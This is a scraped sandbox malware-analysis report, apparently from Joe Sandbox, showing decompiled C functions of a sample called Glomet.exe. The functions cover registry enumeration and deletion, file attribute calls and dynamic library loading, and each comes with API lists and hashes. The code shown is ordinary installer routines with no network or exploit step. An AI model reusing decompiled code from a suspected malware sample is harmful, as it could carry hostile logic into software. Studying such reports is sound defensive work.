                                                                                                                                                                              • API String ID: 3356406503-166031814
                                                                                                                                                                              • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                                                                                                                              • Instruction ID: 76517841fcd29efece62e5e1a2c360dd076a242d2a9727e46a6747b1579fdab2
                                                                                                                                                                              • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                                                                                                                              • Instruction Fuzzy Hash: 8F017C72500209ABDF22CF61CC09FDB3FACEF55364F05803AF956A6192D278D964DBA4
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 00402590 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                                              			E00402590(int* __ebx, intOrPtr __edx, char* __esi) {
				void* _t9;
				int _t10;
				long _t13;
				int* _t16;
				intOrPtr _t21;
				void* _t22;
				char* _t24;
				void* _t26;
				void* _t29;

				_t24 = __esi;
				_t21 = __edx;
				_t16 = __ebx;
				_t9 = E00402C79(_t29, 0x20019); // executed
				_t22 = _t9;
				_t10 = E00402C17(3);
				 *((intOrPtr*)(_t26 - 0x38)) = _t21;
				 *__esi = __ebx;
				if(_t22 == __ebx) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				} else {
					 *(_t26 + 8) = 0x3ff;
					if( *((intOrPtr*)(_t26 - 0x18)) == __ebx) {
						_t13 = RegEnumValueA(_t22, _t10, __esi, _t26 + 8, __ebx, __ebx, __ebx, __ebx);
						__eflags = _t13;
						if(_t13 != 0) {
							 *((intOrPtr*)(_t26 - 4)) = 1;
						}
					} else {
						RegEnumKeyA(_t22, _t10, __esi, 0x3ff);
					}
					_t24[0x3ff] = _t16;
					_push(_t22);
					RegCloseKey();
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}












                                                                                                                                                                              0x00402590
                                                                                                                                                                              0x00402590
                                                                                                                                                                              0x00402590
                                                                                                                                                                              0x00402595
                                                                                                                                                                              0x0040259c
                                                                                                                                                                              0x0040259e
                                                                                                                                                                              0x004025a6
                                                                                                                                                                              0x004025a9
                                                                                                                                                                              0x004025ab
                                                                                                                                                                              0x004027c8
                                                                                                                                                                              0x004025b1
                                                                                                                                                                              0x004025b9
                                                                                                                                                                              0x004025bc
                                                                                                                                                                              0x004025d5
                                                                                                                                                                              0x004025db
                                                                                                                                                                              0x004025dd
                                                                                                                                                                              0x004025df
                                                                                                                                                                              0x004025df
                                                                                                                                                                              0x004025be
                                                                                                                                                                              0x004025c2
                                                                                                                                                                              0x004025c2
                                                                                                                                                                              0x004025e6
                                                                                                                                                                              0x004025ec
                                                                                                                                                                              0x004025ed
                                                                                                                                                                              0x004025ed
                                                                                                                                                                              0x00402ac8
                                                                                                                                                                              0x00402ad4

                                                                                                                                                                              APIs
                                                                                                                                                                              • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025C2
                                                                                                                                                                              • RegEnumValueA.ADVAPI32 ref: 004025D5
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsb11EA.tmp,00000000,00000011,00000002), ref: 004025ED
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Enum$CloseValue
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 397863658-0
                                                                                                                                                                              • Opcode ID: d162c76e602d6482854cfea5e60dbc05a44eb58883d3af9fb6a1c0528d5cc1b7
                                                                                                                                                                              • Instruction ID: 05a6338ea728e2eb0a325d4f1a93e0922101b3b1b3b6e4bdb5826db2e5b3ed57
                                                                                                                                                                              • Opcode Fuzzy Hash: d162c76e602d6482854cfea5e60dbc05a44eb58883d3af9fb6a1c0528d5cc1b7
                                                                                                                                                                              • Instruction Fuzzy Hash: 88017571904104FFE7159F549E88ABF7B6CEB41358F20443EF101A61C0DAB44E449679
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 0040251E Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 84%
                                                                                                                                                                              			E0040251E(int* __ebx, char* __esi) {
				void* _t17;
				char* _t18;
				void* _t33;
				void* _t37;
				void* _t40;

				_t35 = __esi;
				_t27 = __ebx;
				_t17 = E00402C79(_t40, 0x20019); // executed
				_t33 = _t17;
				_t18 = E00402C39(0x33);
				 *__esi = __ebx;
				if(_t33 == __ebx) {
					 *(_t37 - 4) = 1;
				} else {
					 *(_t37 - 0x38) = 0x400;
					if(RegQueryValueExA(_t33, _t18, __ebx, _t37 + 8, __esi, _t37 - 0x38) != 0) {
						L7:
						 *_t35 = _t27;
						 *(_t37 - 4) = 1;
					} else {
						if( *(_t37 + 8) == 4) {
							__eflags =  *(_t37 - 0x18) - __ebx;
							 *(_t37 - 4) = 0 |  *(_t37 - 0x18) == __ebx;
							E004061B5(__esi,  *__esi);
						} else {
							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
								 *(_t37 - 4) =  *(_t37 - 0x18);
								_t35[0x3ff] = _t27;
							} else {
								goto L7;
							}
						}
					}
					_push(_t33);
					RegCloseKey();
				}
				 *0x42f4a8 =  *0x42f4a8 +  *(_t37 - 4);
				return 0;
			}








                                                                                                                                                                              0x0040251e
                                                                                                                                                                              0x0040251e
                                                                                                                                                                              0x00402523
                                                                                                                                                                              0x0040252a
                                                                                                                                                                              0x0040252c
                                                                                                                                                                              0x00402533
                                                                                                                                                                              0x00402535
                                                                                                                                                                              0x004027c8
                                                                                                                                                                              0x0040253b
                                                                                                                                                                              0x0040253e
                                                                                                                                                                              0x00402559
                                                                                                                                                                              0x00402589
                                                                                                                                                                              0x00402589
                                                                                                                                                                              0x0040258b
                                                                                                                                                                              0x0040255b
                                                                                                                                                                              0x0040255f
                                                                                                                                                                              0x00402578
                                                                                                                                                                              0x0040257f
                                                                                                                                                                              0x00402582
                                                                                                                                                                              0x00402561
                                                                                                                                                                              0x00402564
                                                                                                                                                                              0x0040256f
                                                                                                                                                                              0x004025e6
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00402564
                                                                                                                                                                              0x0040255f
                                                                                                                                                                              0x004025ec
                                                                                                                                                                              0x004025ed
                                                                                                                                                                              0x004025ed
                                                                                                                                                                              0x00402ac8
                                                                                                                                                                              0x00402ad4

                                                                                                                                                                              APIs
                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040254E
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsb11EA.tmp,00000000,00000011,00000002), ref: 004025ED
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseQueryValue
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3356406503-0
                                                                                                                                                                              • Opcode ID: d5f2437c19de5f7167ed681dec8eeca0f91e5fcafd86e9c866d4406102cdea3d
                                                                                                                                                                              • Instruction ID: 02260f91894b81efdf071d6bf66139ec23fd99d5adfc3060dafb801450c89547
                                                                                                                                                                              • Opcode Fuzzy Hash: d5f2437c19de5f7167ed681dec8eeca0f91e5fcafd86e9c866d4406102cdea3d
                                                                                                                                                                              • Instruction Fuzzy Hash: 3911BF71905205FFDB25CF64DA989AE7AB4AF01355F20483FE042B72C0D6B88A85DA6D
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 59%
                                                                                                                                                                              			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42f450;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42ec0c =  *0x42ec0c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42ec0c, 0x7530,  *0x42ebf4), 0); // executed
					}
				}
				return 0;
			}











                                                                                                                                                                              0x0040138a
                                                                                                                                                                              0x004013fa
                                                                                                                                                                              0x0040139b
                                                                                                                                                                              0x004013a0
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004013a2
                                                                                                                                                                              0x004013a3
                                                                                                                                                                              0x004013ad
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00401404
                                                                                                                                                                              0x004013b0
                                                                                                                                                                              0x004013b7
                                                                                                                                                                              0x004013bd
                                                                                                                                                                              0x004013be
                                                                                                                                                                              0x004013c0
                                                                                                                                                                              0x004013c2
                                                                                                                                                                              0x004013b9
                                                                                                                                                                              0x004013b9
                                                                                                                                                                              0x004013ba
                                                                                                                                                                              0x004013ba
                                                                                                                                                                              0x004013c9
                                                                                                                                                                              0x004013cb
                                                                                                                                                                              0x004013f4
                                                                                                                                                                              0x004013f4
                                                                                                                                                                              0x004013c9
                                                                                                                                                                              0x00000000

                                                                                                                                                                              APIs
                                                                                                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                              • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                              • Opcode ID: 6d6c05e2d17e61aa35ed6ac458fea53b968503eb473f312dedad9b12065ca57f
                                                                                                                                                                              • Instruction ID: 2b84f8aef59f8f821fe865236d11139dc57ce13a72bb3d14165ba5b6471e206c
                                                                                                                                                                              • Opcode Fuzzy Hash: 6d6c05e2d17e61aa35ed6ac458fea53b968503eb473f312dedad9b12065ca57f
                                                                                                                                                                              • Instruction Fuzzy Hash: B101D1317242209BE7195B79DD08B6A3698E710718F50823AF851F61F1DA78DC129B4C
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 00402429 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E00402429(void* __ebx, void* __edx) {
				long _t6;
				void* _t13;
				long _t18;
				void* _t20;
				void* _t22;
				void* _t23;

				_t13 = __ebx;
				_t26 =  *(_t23 - 0x18) - __ebx;
				_t20 = __edx;
				if( *(_t23 - 0x18) != __ebx) {
					_t6 = E00402CF7(_t20, E00402C39(0x22),  *(_t23 - 0x18) >> 1); // executed
					_t18 = _t6;
					goto L4;
				} else {
					_t22 = E00402C79(_t26, 2);
					if(_t22 == __ebx) {
						L6:
						 *((intOrPtr*)(_t23 - 4)) = 1;
					} else {
						_t18 = RegDeleteValueA(_t22, E00402C39(0x33));
						RegCloseKey(_t22);
						L4:
						if(_t18 != _t13) {
							goto L6;
						}
					}
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t23 - 4));
				return 0;
			}









                                                                                                                                                                              0x00402429
                                                                                                                                                                              0x00402429
                                                                                                                                                                              0x0040242c
                                                                                                                                                                              0x0040242e
                                                                                                                                                                              0x0040246a
                                                                                                                                                                              0x0040246f
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00402430
                                                                                                                                                                              0x00402437
                                                                                                                                                                              0x0040243b
                                                                                                                                                                              0x004027c8
                                                                                                                                                                              0x004027c8
                                                                                                                                                                              0x00402441
                                                                                                                                                                              0x00402451
                                                                                                                                                                              0x00402453
                                                                                                                                                                              0x00402471
                                                                                                                                                                              0x00402473
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00402479
                                                                                                                                                                              0x00402473
                                                                                                                                                                              0x0040243b
                                                                                                                                                                              0x00402ac8
                                                                                                                                                                              0x00402ad4

                                                                                                                                                                              APIs
                                                                                                                                                                              • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 0040244A
                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00402453
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseDeleteValue
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2831762973-0
                                                                                                                                                                              • Opcode ID: 1bb384650293dd56619855d1d7153f99383f55dccfab48f2542542db0f316a34
                                                                                                                                                                              • Instruction ID: c9f6a0f756bffd6fe36e262df4a8f1e623fbd2bf401ec17ba930b5ce720ddf8f
                                                                                                                                                                              • Opcode Fuzzy Hash: 1bb384650293dd56619855d1d7153f99383f55dccfab48f2542542db0f316a34
                                                                                                                                                                              • Instruction Fuzzy Hash: B7F09632A04121ABE720ABB59B8EDAE62A89B50314F65443FF602B71C1D9F84D42566E
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 00401EC5 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 00401EE3
                                                                                                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00401EEE
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$EnableShow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1136574915-0
                                                                                                                                                                              • Opcode ID: 4ed62488277841c23d8b1794959b138f5c2732c1d52f517ca94279be51699118
                                                                                                                                                                              • Instruction ID: a3bdb2f40dd719ba1ad188037836e6c943fd99f7f2fd879611f3d3d4ba476820
                                                                                                                                                                              • Opcode Fuzzy Hash: 4ed62488277841c23d8b1794959b138f5c2732c1d52f517ca94279be51699118
                                                                                                                                                                              • Instruction Fuzzy Hash: 34E01272A082009FD714EBA5AA8956EB7B4EB80365B60443FF101F11D1DBB858458A69
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 00406663 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E00406663(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a240);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a240));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a244));
				}
				_t5 = E004065F5(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                                                                                                                                              0x0040666b
                                                                                                                                                                              0x0040666e
                                                                                                                                                                              0x00406675
                                                                                                                                                                              0x0040667d
                                                                                                                                                                              0x00406689
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406690
                                                                                                                                                                              0x00406680
                                                                                                                                                                              0x00406687
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406698
                                                                                                                                                                              0x00000000

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,00000000,?,004034F5,0000000B), ref: 00406675
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406690
                                                                                                                                                                                • Part of subcall function 004065F5: GetSystemDirectoryA.KERNEL32 ref: 0040660C
                                                                                                                                                                                • Part of subcall function 004065F5: wsprintfA.USER32 ref: 00406645
                                                                                                                                                                                • Part of subcall function 004065F5: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406659
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2547128583-0
                                                                                                                                                                              • Opcode ID: b12ffe7be00a10b97de861747ec59dbd41b3c1b34775c1b4ed269191f8b45ceb
                                                                                                                                                                              • Instruction ID: 42df78af1693d05b1f4151e300c7058424afa75421c13d02aa0b0909378b53c4
                                                                                                                                                                              • Opcode Fuzzy Hash: b12ffe7be00a10b97de861747ec59dbd41b3c1b34775c1b4ed269191f8b45ceb
                                                                                                                                                                              • Instruction Fuzzy Hash: 7FE086326042106BD3105B755E0493B73AC9E997103020D3EF94AF2140D7399C32966D
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 00405DEA Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 68%
                                                                                                                                                                              			E00405DEA(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                                                                                                                              0x00405dee
                                                                                                                                                                              0x00405dfb
                                                                                                                                                                              0x00405e10
                                                                                                                                                                              0x00405e16

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetFileAttributesA.KERNELBASE(00000003,00402F4C,C:\programdata\Glomet.exe,80000000,00000003,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00405DEE
                                                                                                                                                                              • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00405E10
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$AttributesCreate
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 415043291-0
                                                                                                                                                                              • Opcode ID: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                                                                                                                                              • Instruction ID: ee59d6d0e1d409ab4f08bbdf592326cff3c7222ef74ae4255e7f212f1854b30f
                                                                                                                                                                              • Opcode Fuzzy Hash: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                                                                                                                                              • Instruction Fuzzy Hash: F5D09E31654201AFEF0D8F20DE16F2E7AA2EB84B00F11952CB782941E1DA715819AB19
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 00405DC5 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E00405DC5(CHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesA(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}





                                                                                                                                                                              0x00405dca
                                                                                                                                                                              0x00405dd0
                                                                                                                                                                              0x00405dd5
                                                                                                                                                                              0x00405dde
                                                                                                                                                                              0x00405dde
                                                                                                                                                                              0x00405de7

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetFileAttributesA.KERNELBASE(?,?,004059DD,?,?,00000000,00405BC0,?,?,?,?), ref: 00405DCA
                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405DDE
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
